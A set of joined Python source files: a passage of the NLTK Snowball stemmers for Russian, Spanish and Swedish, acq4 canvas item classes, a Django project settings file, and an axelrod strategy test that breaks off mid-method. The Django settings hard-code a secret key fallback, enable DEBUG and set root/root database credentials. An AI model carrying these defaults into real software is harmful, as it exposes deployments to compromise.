                                  'shchoi^u', 'shchei^u', 'emi^ui^u',
                                  'emi^ai^a', 'nni^ui^u', 'nni^ai^a',
                                  'shchimi', 'shchymi', 'shchego', 'shchogo',
                                  'shchemu', 'shchomu', 'shchikh', 'shchykh',
                                  'vshui^u', 'vshai^a', 'vshoi^u', 'vshei^u',
                                  'shchee', 'shchie', 'shchye', 'shchoe',
                                  'shchei`', 'shchii`', 'shchyi`', 'shchoi`',
                                  'shchem', 'shchim', 'shchym', 'shchom',
                                  'vshimi', 'vshymi', 'vshego', 'vshogo',
                                  'vshemu', 'vshomu', 'vshikh', 'vshykh',
                                  'emui^u', 'emai^a', 'emoi^u', 'emei^u',
                                  'nnui^u', 'nnai^a', 'nnoi^u', 'nnei^u',
                                  'vshee', 'vshie', 'vshye', 'vshoe',
                                  'vshei`', 'vshii`', 'vshyi`', 'vshoi`',
                                  'vshem', 'vshim', 'vshym', 'vshom',
                                  'emimi', 'emymi', 'emego', 'emogo',
                                  'ememu', 'emomu', 'emikh', 'emykh',
                                  'nnimi', 'nnymi', 'nnego', 'nnogo',
                                  'nnemu', 'nnomu', 'nnikh', 'nnykh',
                                  'emee', 'emie', 'emye', 'emoe', 'emei`',
                                  'emii`', 'emyi`', 'emoi`', 'emem', 'emim',
                                  'emym', 'emom', 'nnee', 'nnie', 'nnye',
                                  'nnoe', 'nnei`', 'nnii`', 'nnyi`', 'nnoi`',
                                  'nnem', 'nnim', 'nnym', 'nnom'):
                        if (rv[-len(suffix)-3:-len(suffix)] == "i^a" or
                            rv[-len(suffix)-1:-len(suffix)] == "a"):
                            word = word[:-len(suffix)]
                            r2 = r2[:-len(suffix)]
                            rv = rv[:-len(suffix)]
                            adjectival_removed = True
                            break
                    else:
                        word = word[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        rv = rv[:-len(suffix)]
                        adjectival_removed = True
                        break

            if not adjectival_removed:
                for suffix in self.__verb_suffixes:
                    if rv.endswith(suffix):
                        # This subset of verb endings also needs the
                        # preceding "a"/"i^a" check.
                        if suffix in ("la", "na", "ete", "i`te", "li",
                                      "i`", "l", "em", "n", "lo", "no",
                                      "et", "i^ut", "ny", "t'", "esh'",
                                      "nno"):
                            if (rv[-len(suffix)-3:-len(suffix)] == "i^a" or
                                rv[-len(suffix)-1:-len(suffix)] == "a"):
                                word = word[:-len(suffix)]
                                r2 = r2[:-len(suffix)]
                                rv = rv[:-len(suffix)]
                                verb_removed = True
                                break
                        else:
                            word = word[:-len(suffix)]
                            r2 = r2[:-len(suffix)]
                            rv = rv[:-len(suffix)]
                            verb_removed = True
                            break

            if not adjectival_removed and not verb_removed:
                for suffix in self.__noun_suffixes:
                    if rv.endswith(suffix):
                        word = word[:-len(suffix)]
                        r2 = r2[:-len(suffix)]
                        rv = rv[:-len(suffix)]
                        break

        # Step 2: remove a final "i" (и) in rv.
        if rv.endswith("i"):
            word = word[:-1]
            r2 = r2[:-1]

        # Step 3: derivational endings, only when found in R2.
        for suffix in self.__derivational_suffixes:
            if r2.endswith(suffix):
                word = word[:-len(suffix)]
                break

        # Step 4: undouble "nn", or remove a superlative ending and then
        # undouble; otherwise drop a trailing soft sign.
        if word.endswith("nn"):
            word = word[:-1]
            undouble_success = True

        if not undouble_success:
            for suffix in self.__superlative_suffixes:
                if word.endswith(suffix):
                    word = word[:-len(suffix)]
                    superlative_removed = True
                    break
            if word.endswith("nn"):
                word = word[:-1]

        if not undouble_success and not superlative_removed:
            if word.endswith("'"):
                word = word[:-1]

        if chr_exceeded:
            word = self.__roman_to_cyrillic(word)

        return word

    def __regions_russian(self, word):
        """
        Return the regions RV and R2 which are used by the Russian stemmer.

        In any word, RV is the region after the first vowel,
        or the end of the word if it contains no vowel.

        R2 is the region after the first non-vowel following
        a vowel in R1, or the end of the word if there is no such non-vowel.

        R1 is the region after the first non-vowel following a vowel,
        or the end of the word if there is no such non-vowel.

        :param word: The Russian word whose regions RV and R2 are determined.
        :type word: str or unicode
        :return: the regions RV and R2 for the respective Russian word.
        :rtype: tuple
        :note: This helper method is invoked by the stem method of the subclass
               RussianStemmer. It is not to be invoked directly!
        """
        r1 = ""
        r2 = ""
        rv = ""

        # Temporarily collapse the romanized digraphs to single marker
        # characters so each vowel occupies exactly one position.
        vowels = ("A", "U", "E", "a", "e", "i", "o", "u", "y")
        word = (word.replace("i^a", "A")
                .replace("i^u", "U")
                .replace("e`", "E"))

        for i in range(1, len(word)):
            if word[i] not in vowels and word[i-1] in vowels:
                r1 = word[i+1:]
                break

        for i in range(1, len(r1)):
            if r1[i] not in vowels and r1[i-1] in vowels:
                r2 = r1[i+1:]
                break

        for i in range(len(word)):
            if word[i] in vowels:
                rv = word[i+1:]
                break

        # Expand the markers back before returning.
        r2 = (r2.replace("A", "i^a")
              .replace("U", "i^u")
              .replace("E", "e`"))
        rv = (rv.replace("A", "i^a")
              .replace("U", "i^u")
              .replace("E", "e`"))

        return (rv, r2)

    def __cyrillic_to_roman(self, word):
        """
        Transliterate a Russian word into the Roman alphabet.

        A Russian word whose letters consist of the Cyrillic
        alphabet are transliterated into the Roman alphabet
        in order to ease the forthcoming stemming process.

        :param word: The word that is transliterated.
        :type word: unicode
        :return: the transliterated word.
        :rtype: unicode
        :note: This helper method is invoked by the stem method of the subclass
               RussianStemmer. It is not to be invoked directly!
        """
        word = (word.replace("\u0410", "a").replace("\u0430", "a")
                .replace("\u0411", "b").replace("\u0431", "b")
                .replace("\u0412", "v").replace("\u0432", "v")
                .replace("\u0413", "g").replace("\u0433", "g")
                .replace("\u0414", "d").replace("\u0434", "d")
                .replace("\u0415", "e").replace("\u0435", "e")
                .replace("\u0401", "e").replace("\u0451", "e")
                .replace("\u0416", "zh").replace("\u0436", "zh")
                .replace("\u0417", "z").replace("\u0437", "z")
                .replace("\u0418", "i").replace("\u0438", "i")
                .replace("\u0419", "i`").replace("\u0439", "i`")
                .replace("\u041A", "k").replace("\u043A", "k")
                .replace("\u041B", "l").replace("\u043B", "l")
                .replace("\u041C", "m").replace("\u043C", "m")
                .replace("\u041D", "n").replace("\u043D", "n")
                .replace("\u041E", "o").replace("\u043E", "o")
                .replace("\u041F", "p").replace("\u043F", "p")
                .replace("\u0420", "r").replace("\u0440", "r")
                .replace("\u0421", "s").replace("\u0441", "s")
                .replace("\u0422", "t").replace("\u0442", "t")
                .replace("\u0423", "u").replace("\u0443", "u")
                .replace("\u0424", "f").replace("\u0444", "f")
                .replace("\u0425", "kh").replace("\u0445", "kh")
                .replace("\u0426", "t^s").replace("\u0446", "t^s")
                .replace("\u0427", "ch").replace("\u0447", "ch")
                .replace("\u0428", "sh").replace("\u0448", "sh")
                .replace("\u0429", "shch").replace("\u0449", "shch")
                .replace("\u042A", "''").replace("\u044A", "''")
                .replace("\u042B", "y").replace("\u044B", "y")
                .replace("\u042C", "'").replace("\u044C", "'")
                .replace("\u042D", "e`").replace("\u044D", "e`")
                .replace("\u042E", "i^u").replace("\u044E", "i^u")
                .replace("\u042F", "i^a").replace("\u044F", "i^a"))
        return word

    def __roman_to_cyrillic(self, word):
        """
        Transliterate a Russian word back into the Cyrillic alphabet.

        A Russian word formerly transliterated into the Roman alphabet
        in order to ease the stemming process, is transliterated back
        into the Cyrillic alphabet, its original form.

        :param word: The word that is transliterated.
        :type word: str or unicode
        :return: word, the transliterated word.
        :rtype: unicode
        :note: This helper method is invoked by the stem method of the subclass
               RussianStemmer. It is not to be invoked directly!
        """
        # Multi-character romanizations ("shch", "kh", "t^s", ...) must be
        # replaced before their single-character substrings, so the order
        # of this chain is significant.
        word = (word.replace("i^u", "\u044E").replace("i^a", "\u044F")
                .replace("shch", "\u0449").replace("kh", "\u0445")
                .replace("t^s", "\u0446").replace("ch", "\u0447")
                .replace("e`", "\u044D").replace("i`", "\u0439")
                .replace("sh", "\u0448").replace("k", "\u043A")
                .replace("e", "\u0435").replace("zh", "\u0436")
                .replace("a", "\u0430").replace("b", "\u0431")
                .replace("v", "\u0432").replace("g", "\u0433")
                .replace("d", "\u0434").replace("e", "\u0435")
                .replace("z", "\u0437").replace("i", "\u0438")
                .replace("l", "\u043B").replace("m", "\u043C")
                .replace("n", "\u043D").replace("o", "\u043E")
                .replace("p", "\u043F").replace("r", "\u0440")
                .replace("s", "\u0441").replace("t", "\u0442")
                .replace("u", "\u0443").replace("f", "\u0444")
                .replace("''", "\u044A").replace("y", "\u044B")
                .replace("'", "\u044C"))
        return word
class SpanishStemmer(_StandardStemmer):
    """
    The Spanish Snowball stemmer.

    :cvar __vowels: The Spanish vowels.
    :type __vowels: unicode
    :cvar __step0_suffixes: Suffixes to be deleted in step 0 of the algorithm.
    :type __step0_suffixes: tuple
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2a_suffixes: Suffixes to be deleted in step 2a of the algorithm.
    :type __step2a_suffixes: tuple
    :cvar __step2b_suffixes: Suffixes to be deleted in step 2b of the algorithm.
    :type __step2b_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :note: A detailed description of the Spanish
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/spanish/stemmer.html
    """

    __vowels = "aeiou\xE1\xE9\xED\xF3\xFA\xFC"

    # All suffix tuples are ordered longest-first; the matching loops
    # break on the first (longest) match, so the order is significant.
    __step0_suffixes = ("selas", "selos", "sela", "selo", "las",
                        "les", "los", "nos", "me", "se", "la", "le",
                        "lo")
    __step1_suffixes = ('amientos', 'imientos', 'amiento', 'imiento',
                        'aciones', 'uciones', 'adoras', 'adores',
                        'ancias', 'log\xEDas', 'encias', 'amente',
                        'idades', 'anzas', 'ismos', 'ables', 'ibles',
                        'istas', 'adora', 'aci\xF3n', 'antes',
                        'ancia', 'log\xEDa', 'uci\xf3n', 'encia',
                        'mente', 'anza', 'icos', 'icas', 'ismo',
                        'able', 'ible', 'ista', 'osos', 'osas',
                        'ador', 'ante', 'idad', 'ivas', 'ivos',
                        'ico',
                        'ica', 'oso', 'osa', 'iva', 'ivo')
    __step2a_suffixes = ('yeron', 'yendo', 'yamos', 'yais', 'yan',
                         'yen', 'yas', 'yes', 'ya', 'ye', 'yo',
                         'y\xF3')
    __step2b_suffixes = ('ar\xEDamos', 'er\xEDamos', 'ir\xEDamos',
                         'i\xE9ramos', 'i\xE9semos', 'ar\xEDais',
                         'aremos', 'er\xEDais', 'eremos',
                         'ir\xEDais', 'iremos', 'ierais', 'ieseis',
                         'asteis', 'isteis', '\xE1bamos',
                         '\xE1ramos', '\xE1semos', 'ar\xEDan',
                         'ar\xEDas', 'ar\xE9is', 'er\xEDan',
                         'er\xEDas', 'er\xE9is', 'ir\xEDan',
                         'ir\xEDas', 'ir\xE9is',
                         'ieran', 'iesen', 'ieron', 'iendo', 'ieras',
                         'ieses', 'abais', 'arais', 'aseis',
                         '\xE9amos', 'ar\xE1n', 'ar\xE1s',
                         'ar\xEDa', 'er\xE1n', 'er\xE1s',
                         'er\xEDa', 'ir\xE1n', 'ir\xE1s',
                         'ir\xEDa', 'iera', 'iese', 'aste', 'iste',
                         'aban', 'aran', 'asen', 'aron', 'ando',
                         'abas', 'adas', 'idas', 'aras', 'ases',
                         '\xEDais', 'ados', 'idos', 'amos', 'imos',
                         'emos', 'ar\xE1', 'ar\xE9', 'er\xE1',
                         'er\xE9', 'ir\xE1', 'ir\xE9', 'aba',
                         'ada', 'ida', 'ara', 'ase', '\xEDan',
                         'ado', 'ido', '\xEDas', '\xE1is',
                         '\xE9is', '\xEDa', 'ad', 'ed', 'id',
                         'an', 'i\xF3', 'ar', 'er', 'ir', 'as',
                         '\xEDs', 'en', 'es')
    __step3_suffixes = ("os", "a", "e", "o", "\xE1",
                        "\xE9", "\xED", "\xF3")

    def stem(self, word):
        """
        Stem a Spanish word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        if word in self.stopwords:
            return word

        step1_success = False

        # R1/R2/RV are the standard Snowball regions; word, r1, r2 and rv
        # are truncated in lockstep throughout.
        r1, r2 = self._r1r2_standard(word, self.__vowels)
        rv = self._rv_standard(word, self.__vowels)

        # STEP 0: Attached pronoun
        for suffix in self.__step0_suffixes:
            if not (word.endswith(suffix) and rv.endswith(suffix)):
                continue

            # The pronoun is only detached after a gerund or infinitive
            # ending (accented or not); "uyendo" keeps its 'u'.
            if ((rv[:-len(suffix)].endswith(("ando", "\xE1ndo",
                                             "ar", "\xE1r",
                                             "er", "\xE9r",
                                             "iendo", "i\xE9ndo",
                                             "ir", "\xEDr"))) or
                (rv[:-len(suffix)].endswith("yendo") and
                 word[:-len(suffix)].endswith("uyendo"))):

                word = self.__replace_accented(word[:-len(suffix)])
                r1 = self.__replace_accented(r1[:-len(suffix)])
                r2 = self.__replace_accented(r2[:-len(suffix)])
                rv = self.__replace_accented(rv[:-len(suffix)])
            break

        # STEP 1: Standard suffix removal
        for suffix in self.__step1_suffixes:
            if not word.endswith(suffix):
                continue

            if suffix == "amente" and r1.endswith(suffix):
                step1_success = True
                word = word[:-6]
                r2 = r2[:-6]
                rv = rv[:-6]

                # Strip a preceding derivational element if still in R2.
                if r2.endswith("iv"):
                    word = word[:-2]
                    r2 = r2[:-2]
                    rv = rv[:-2]

                    if r2.endswith("at"):
                        word = word[:-2]
                        rv = rv[:-2]

                elif r2.endswith(("os", "ic", "ad")):
                    word = word[:-2]
                    rv = rv[:-2]

            elif r2.endswith(suffix):
                step1_success = True

                if suffix in ("adora", "ador", "aci\xF3n", "adoras",
                              "adores", "aciones", "ante", "antes",
                              "ancia", "ancias"):
                    word = word[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]

                    if r2.endswith("ic"):
                        word = word[:-2]
                        rv = rv[:-2]

                elif suffix in ("log\xEDa", "log\xEDas"):
                    word = suffix_replace(word, suffix, "log")
                    rv = suffix_replace(rv, suffix, "log")

                elif suffix in ("uci\xF3n", "uciones"):
                    word = suffix_replace(word, suffix, "u")
                    rv = suffix_replace(rv, suffix, "u")

                elif suffix in ("encia", "encias"):
                    word = suffix_replace(word, suffix, "ente")
                    rv = suffix_replace(rv, suffix, "ente")

                elif suffix == "mente":
                    word = word[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]

                    if r2.endswith(("ante", "able", "ible")):
                        word = word[:-4]
                        rv = rv[:-4]

                elif suffix in ("idad", "idades"):
                    word = word[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]

                    for pre_suff in ("abil", "ic", "iv"):
                        if r2.endswith(pre_suff):
                            word = word[:-len(pre_suff)]
                            rv = rv[:-len(pre_suff)]

                elif suffix in ("ivo", "iva", "ivos", "ivas"):
                    word = word[:-len(suffix)]
                    r2 = r2[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    if r2.endswith("at"):
                        word = word[:-2]
                        rv = rv[:-2]
                else:
                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
            break

        # STEP 2a: Verb suffixes beginning 'y' — only if step 1 failed;
        # the ending must be preceded by 'u' (as in "construyendo").
        if not step1_success:
            for suffix in self.__step2a_suffixes:
                if (rv.endswith(suffix) and
                    word[-len(suffix)-1:-len(suffix)] == "u"):
                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    break

        # STEP 2b: Other verb suffixes (still within the step-1-failed
        # branch above).
            for suffix in self.__step2b_suffixes:
                if rv.endswith(suffix):
                    word = word[:-len(suffix)]
                    rv = rv[:-len(suffix)]
                    if suffix in ("en", "es", "\xE9is", "emos"):
                        # Undo a now-dangling 'gu' -> 'g'.
                        if word.endswith("gu"):
                            word = word[:-1]

                        if rv.endswith("gu"):
                            rv = rv[:-1]
                    break

        # STEP 3: Residual suffix
        for suffix in self.__step3_suffixes:
            if rv.endswith(suffix):
                word = word[:-len(suffix)]
                if suffix in ("e", "\xE9"):
                    rv = rv[:-len(suffix)]

                    if word[-2:] == "gu" and rv.endswith("u"):
                        word = word[:-1]
                break

        word = self.__replace_accented(word)

        return word

    def __replace_accented(self, word):
        """
        Replaces all accented letters on a word with their non-accented
        counterparts.

        :param word: A spanish word, with or without accents
        :type word: str or unicode
        :return: a word with the accented letters (á, é, í, ó, ú) replaced with
                 their non-accented counterparts (a, e, i, o, u)
        :rtype: str or unicode
        """
        return (word.replace("\xE1", "a")
                .replace("\xE9", "e")
                .replace("\xED", "i")
                .replace("\xF3", "o")
                .replace("\xFA", "u"))
class SwedishStemmer(_ScandinavianStemmer):
    """
    The Swedish Snowball stemmer.

    :cvar __vowels: The Swedish vowels.
    :type __vowels: unicode
    :cvar __s_ending: Letters that may directly appear before a word final 's'.
    :type __s_ending: unicode
    :cvar __step1_suffixes: Suffixes to be deleted in step 1 of the algorithm.
    :type __step1_suffixes: tuple
    :cvar __step2_suffixes: Suffixes to be deleted in step 2 of the algorithm.
    :type __step2_suffixes: tuple
    :cvar __step3_suffixes: Suffixes to be deleted in step 3 of the algorithm.
    :type __step3_suffixes: tuple
    :note: A detailed description of the Swedish
           stemming algorithm can be found under
           http://snowball.tartarus.org/algorithms/swedish/stemmer.html
    """
    __vowels = "aeiouy\xE4\xE5\xF6"
    __s_ending = "bcdfghjklmnoprtvy"
    # Suffix tuples are ordered longest-first so the first (longest) match
    # wins; do not reorder.
    __step1_suffixes = ("heterna", "hetens", "heter", "heten",
                        "anden", "arnas", "ernas", "ornas", "andes",
                        "andet", "arens", "arna", "erna", "orna",
                        "ande", "arne", "aste", "aren", "ades",
                        "erns", "ade", "are", "ern", "ens", "het",
                        "ast", "ad", "en", "ar", "er", "or", "as",
                        "es", "at", "a", "e", "s")
    __step2_suffixes = ("dd", "gd", "nn", "dt", "gt", "kt", "tt")
    __step3_suffixes = ("fullt", "l\xF6st", "els", "lig", "ig")

    def stem(self, word):
        """
        Stem a Swedish word and return the stemmed form.

        :param word: The word that is stemmed.
        :type word: str or unicode
        :return: The stemmed form.
        :rtype: unicode
        """
        word = word.lower()

        # Stopwords are returned unchanged.
        if word in self.stopwords:
            return word

        # R1: region after the first non-vowel following a vowel
        # (computed by the shared Scandinavian base class).
        r1 = self._r1_scandinavian(word, self.__vowels)

        # STEP 1: delete the longest suffix found in R1; a bare 's' is
        # only deleted after a valid s-ending consonant.
        for suffix in self.__step1_suffixes:
            if r1.endswith(suffix):
                if suffix == "s":
                    # NOTE(review): word[-2] assumes len(word) >= 2 here —
                    # appears guaranteed by R1 construction; confirm.
                    if word[-2] in self.__s_ending:
                        word = word[:-1]
                        r1 = r1[:-1]
                else:
                    word = word[:-len(suffix)]
                    r1 = r1[:-len(suffix)]
                break

        # STEP 2: if R1 ends in one of the listed consonant pairs,
        # remove only the final letter.
        for suffix in self.__step2_suffixes:
            if r1.endswith(suffix):
                word = word[:-1]
                r1 = r1[:-1]
                break

        # STEP 3: residual suffixes — 'els'/'lig'/'ig' are removed
        # entirely, 'fullt'/'löst' lose only their last letter.
        for suffix in self.__step3_suffixes:
            if r1.endswith(suffix):
                if suffix in ("els", "lig", "ig"):
                    word = word[:-len(suffix)]
                elif suffix in ("fullt", "l\xF6st"):
                    word = word[:-1]
                break

        return word
def demo():
    """
    This function provides a demonstration of the Snowball stemmers.

    After invoking this function and specifying a language,
    it stems an excerpt of the Universal Declaration of Human Rights
    (which is a part of the NLTK corpus collection) and then prints
    out the original and the stemmed text.
    """
    import re
    from nltk.corpus import udhr

    # Maps each stemmer language name to the UDHR corpus file to sample.
    udhr_corpus = {"danish": "Danish_Dansk-Latin1",
                   "dutch": "Dutch_Nederlands-Latin1",
                   "english": "English-Latin1",
                   "finnish": "Finnish_Suomi-Latin1",
                   "french": "French_Francais-Latin1",
                   "german": "German_Deutsch-Latin1",
                   "hungarian": "Hungarian_Magyar-UTF8",
                   "italian": "Italian_Italiano-Latin1",
                   "norwegian": "Norwegian-Latin1",
                   "porter": "English-Latin1",
                   "portuguese": "Portuguese_Portugues-Latin1",
                   "romanian": "Romanian_Romana-Latin2",
                   "russian": "Russian-UTF8",
                   "spanish": "Spanish-Latin1",
                   "swedish": "Swedish_Svenska-Latin1",
                   }

    print("\n")
    print("******************************")
    print("Demo for the Snowball stemmers")
    print("******************************")

    # Interactive loop: prompt until the user types 'exit'.
    while True:
        language = compat.raw_input("Please enter the name of the language " +
                                    "to be demonstrated\n" +
                                    "/".join(SnowballStemmer.languages) +
                                    "\n" +
                                    "(enter 'exit' in order to leave): ")

        if language == "exit":
            break

        if language not in SnowballStemmer.languages:
            print(("\nOops, there is no stemmer for this language. " +
                   "Please try again.\n"))
            continue

        stemmer = SnowballStemmer(language)

        # Take the first 300 words of the excerpt only.
        excerpt = udhr.words(udhr_corpus[language]) [:300]

        stemmed = " ".join(stemmer.stem(word) for word in excerpt)
        # Re-wrap both texts to at most ~70 characters per line.
        stemmed = re.sub(r"(.{,70})\s", r'\1\n', stemmed+' ').rstrip()
        excerpt = " ".join(excerpt)
        excerpt = re.sub(r"(.{,70})\s", r'\1\n', excerpt+' ').rstrip()

        print("\n")
        print('-' * 70)
        print('ORIGINAL'.center(70))
        print(excerpt)
        print("\n\n")
        print('STEMMED RESULTS'.center(70))
        print(stemmed)
        print('-' * 70)
        print("\n")
|
from __future__ import print_function
from acq4.util import Qt
import acq4.pyqtgraph as pg
from .CanvasItem import CanvasItem
from .itemtypes import registerItemType
class GridCanvasItem(CanvasItem):
    """Canvas item wrapping a pyqtgraph GridItem."""
    _typeName = "Grid"

    def __init__(self, **kwds):
        # Discard any stored viewRect option; only the remaining keyword
        # options are forwarded to the CanvasItem base.
        kwds.pop('viewRect', None)
        item = pg.GridItem()
        CanvasItem.__init__(self, item, **kwds)

registerItemType(GridCanvasItem)
class RulerCanvasItem(CanvasItem):
    """Canvas item wrapping a RulerROI, with sensible default endpoints."""
    _typeName = "Ruler"

    def __init__(self, points=None, **kwds):
        view_rect = kwds.pop('viewRect', None)
        if points is None:
            points = self._defaultPoints(view_rect)
        roi = pg.graphicsItems.ROI.RulerROI(points)
        CanvasItem.__init__(self, roi, **kwds)

    @staticmethod
    def _defaultPoints(view_rect):
        # No view information: fall back to a unit diagonal.
        if view_rect is None:
            return ((0, 0), (1, 1))
        # Otherwise span 20% of the way from the view center toward
        # its top-right corner.
        start = view_rect.center()
        end = start + 0.2 * (view_rect.topRight() - start)
        return ((start.x(), start.y()), (end.x(), end.y()))

registerItemType(RulerCanvasItem)
class SvgCanvasItem(CanvasItem):
    """Canvas item displaying the contents of an SVG file."""
    _typeName = "SVG"

    def __init__(self, handle, **opts):
        # Keep the originating file handle in the item options.
        opts['handle'] = handle
        graphics_item = Qt.QGraphicsSvgItem(handle.name())
        CanvasItem.__init__(self, graphics_item, **opts)

    @classmethod
    def checkFile(cls, fh):
        """Return the match priority for *fh*: 100 for .svg files, else 0."""
        is_svg_file = fh.isFile() and fh.ext() == '.svg'
        return 100 if is_svg_file else 0

registerItemType(SvgCanvasItem)
|
"""
Django settings for kboard project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os

# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

# SECURITY WARNING: keep the secret key used in production secret!
# Prefer the KBOARD_SECRET_KEY environment variable; the hard-coded value
# remains as a development fallback so existing setups keep working.
SECRET_KEY = os.environ.get(
    'KBOARD_SECRET_KEY',
    'fbk#a_$7&@566onvmd1xfxyszz)npb+d5gq#y9q(n0wg_k)v0x'
)

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True

ALLOWED_HOSTS = []

# Custom user model provided by the accounts app.
AUTH_USER_MODEL = 'accounts.Account'
# Application definition
INSTALLED_APPS = [
    'accounts',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    'core',
    'board',
    'django_summernote',
    'djangobower',
    'pipeline',
]

# Static file finders; PipelineFinder is required by django-pipeline.
STATICFILES_FINDERS = [
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
    'pipeline.finders.PipelineFinder'
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'kboard.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
                'core.context_processors.navbar'
            ],
        },
    },
]

WSGI_APPLICATION = 'kboard.wsgi.application'

# Database: SQLite while developing (DEBUG), MySQL otherwise.
if DEBUG:
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
            'NAME': os.path.join(BASE_DIR, '../database/db.sqlite3'),
        }
    }
else:
    # NOTE(review): no HOST/PORT set, so Django defaults to a local MySQL
    # socket; credentials are hard-coded — confirm before deploying.
    DATABASES = {
        'default': {
            'ENGINE': 'django.db.backends.mysql',
            'NAME': 'kboard',
            'USER': 'root',
            'PASSWORD': 'root'
        }
    }

# Password validation
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Frontend packages installed via django-bower.
BOWER_INSTALLED_APPS = [
    'jquery#3.1.1',
    'bootstrap#3.3.7'
]
BOWER_COMPONENTS_ROOT = os.path.join(BASE_DIR, '../')

SUMMERNOTE_CONFIG = {}

# django-pipeline asset bundling.
# NOTE(review): 'COMPILERS' is a set literal; pipeline examples use a
# list/tuple — works while iterable, but confirm ordering never matters.
PIPELINE = {
    'COMPILERS': {
        'libsasscompiler.LibSassCompiler',
    },
    'JAVASCRIPT': {
        'main': {
            'source_filenames': [
                'js/*.js'
            ],
            'output_filename': 'js/vendor.js'
        },
    },
    'STYLESHEETS': {
        'main': {
            'source_filenames': [
                'style/*.scss'
            ],
            'output_filename': 'style/main.css'
        },
    },
}

# Internationalization
LANGUAGE_CODE = 'ko-kr'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True

# Static assets (collected outside the project dir) and media uploads.
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, '../static')
STATICFILES_STORAGE = 'pipeline.storage.PipelineStorage'
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, 'static'),
    os.path.join(BOWER_COMPONENTS_ROOT, 'bower_components'),
]
MEDIA_URL = '/file/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'file')

# Days a registration activation link stays valid.
ACCOUNT_ACTIVATION_DAYS = 7

# Outgoing mail: Gmail SMTP over TLS; credentials come from the environment.
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_PORT = 587
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = os.environ.get('KBOARD_EMAIL')
EMAIL_HOST_PASSWORD = os.environ.get('KBOARD_PASSWORD')

LOGIN_REDIRECT_URL = "/"
LOGOUT_REDIRECT_URL = "/"
|
"""Test for the once bitten strategy."""
import random
import axelrod
from .test_player import TestPlayer
C, D = 'C', 'D'
class TestOnceBitten(TestPlayer):
    """Tests for the OnceBitten strategy (grudges after two defections)."""

    name = "Once Bitten"
    player = axelrod.OnceBitten
    expected_classifier = {
        'memory_depth': 12,
        'stochastic': False,
        'inspects_source': False,
        'manipulates_source': False,
        'manipulates_state': False
    }

    def test_initial_strategy(self):
        """Starts by cooperating."""
        P1 = axelrod.OnceBitten()
        P2 = axelrod.Player()
        self.assertEqual(P1.strategy(P2), C)

    def test_strategy(self):
        """If opponent defects at any point then the player will defect
        forever."""
        P1 = axelrod.OnceBitten()
        P2 = axelrod.Player()
        # Starts by playing C
        self.assertEqual(P1.strategy(P2), C)
        self.assertEqual(P1.grudged, False)
        P2.history.append(C)
        self.assertEqual(P1.strategy(P2), C)
        self.assertEqual(P1.grudged, False)
        P2.history.append(C)
        self.assertEqual(P1.strategy(P2), C)
        self.assertEqual(P1.grudged, False)
        # A single defection does not yet trigger the grudge...
        P2.history.append(D)
        self.assertEqual(P1.strategy(P2), C)
        self.assertEqual(P1.grudged, False)
        # ...but two consecutive defections do.
        P2.history.append(D)
        self.assertEqual(P2.history, [C, C, D, D])
        self.assertEqual(P1.strategy(P2), D)
        self.assertEqual(P1.grudged, True)

        for turn in range(P1.mem_length-1):
            self.assertEqual(P1.strategy(P2), D)
            # Doesn't matter what opponent plays now
            P2.history.append(C)
            self.assertEqual(P1.grudged, True)
            P2.history.append(D)
            self.assertEqual(P1.grudged, True)

        self.assertEqual(P1.strategy(P2), D)
        self.assertEqual(P1.grudge_memory, 10)
        self.assertEqual(P1.grudged, True)
        P2.history.append(C)

    def test_reset(self):
